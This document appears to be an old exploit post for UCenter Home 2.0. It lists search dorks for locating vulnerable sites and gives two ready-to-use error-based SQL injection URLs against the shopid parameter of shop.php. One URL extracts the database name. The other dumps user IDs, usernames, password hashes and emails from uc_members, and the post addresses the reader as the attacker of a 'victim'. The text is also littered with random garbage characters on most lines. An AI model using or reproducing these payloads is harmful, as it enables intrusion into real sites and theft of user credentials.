# Y1 ~$ ~8 P, w/ S/ D, n8 l
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 1 n( N! o/ m. Z# V& I! V9 K
8 d. v4 h1 f3 _2 O! ?
1 W6 Y! ?7 E+ W. m( T! U. p6 S4 ~2 ?0 K1 H) ]& Z" L
*/ Author : KnocKout 0 e( e6 k" ^# |+ R5 G7 ~1 S
* J) ~" I' P2 j" T; V
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
! l7 |+ ]+ \( q! X- x8 p. `4 Z; `7 U1 ]) ?- g2 B, v- D" U5 [, b) H( B
*/ Contact: knockoutr@msn.com
) E' |3 h; a+ |# h3 C( _9 n8 Z. d1 a5 f
2 ~4 k4 ^" W# i! q9 U( }4 V% R*/ Cyber-Warrior.org/CWKnocKout
* `# w! u: w8 y( `
& |! E7 y7 H# L6 P__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
4 n/ U: @2 T6 I* D- m) {2 r
2 e6 |# k# N6 r% o8 l' {Script : UCenter Home ' D* g; @$ a, K
_) b3 U; ^ D7 j
Version : 2.0 ^3 i9 z. \; I
3 h+ v+ P! I9 `9 E$ p
Script HomePage : http://u.discuz.net/
. W( c( f( V( ?" E+ c) u: M k; T4 W- K0 `5 T h
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
. w7 t: [2 \ K" |. n& U( E4 e1 X0 B- T4 F5 N5 Y* \
Dork : Powered by UCenter inurl:shop.php?ac=view + {; H: ~. P" ^1 ?, V; ^; e# F7 o
( A/ ]# f' ~& ~/ L0 {8 ZDork 2 : inurl:shop.php?ac=view&shopid=
1 @ w# |: X& @ y5 D+ V: ^2 t+ ^' s" s( R6 C
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( f- A2 T4 o5 C. _
. s( e9 g. s; D8 y' d. ^3 {8 ?Vuln file : Shop.php * B$ O1 X) @ y: q5 r' ~- }+ B
4 v A: |- D" b* v' ?! X# yvalue's : (?)ac=view&shopid= 5 u. n- w7 C, k8 p, S$ ^
7 E$ x, H) \3 B- NVulnerable Style : SQL Injection (MySQL Error Based) 5 E+ m* Y d7 a& J% V S
) _. q$ L* |5 [1 GNeed Metarials : Hex Conversion 3 ~" d9 g2 D0 k; U% F9 p
' S9 e3 H; X: r7 I, n
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * \4 w, a/ Q7 Z: k- E5 {
1 Q9 F3 ~$ Y1 k: s0 d
Your Need victim Database name. , Z0 B, M t( z3 R
4 w" H& x4 ^' M/ e& P
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
a/ Y! ?& E& l( v
: s/ w- `4 w7 r. E.. & ?9 z- w( K2 }6 T2 T
+ V5 y2 n' }' Y3 O. V( aDB : Okey. 3 C0 A( L3 q3 V$ v) s! r
2 k7 e* l5 Z* `0 q. i/ z3 Y
your edit DB `[TARGET DB NAME]` 2 ]( A" {& g3 _" e, r9 ~, l8 U U! a
) g& n ^- m) T; l' P
Example : 'hiwir1_ucenter'
3 o' s, |& Z+ M" c9 P; o
6 X4 }. |* i# v" i- |+ NEdit : Okey.
; q+ L9 q9 D5 F
) I4 b- r- p& R: ~* jYour use Hex conversion. And edit Your SQL Injection Exploit.. 3 z2 o$ x+ X- e$ J C
: [- D% o( A6 d
* ~# q+ H& D8 g- e: c' y7 D$ X6 E5 m, W9 y8 b2 ?
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
/ }7 F3 P1 H( }8 O( i |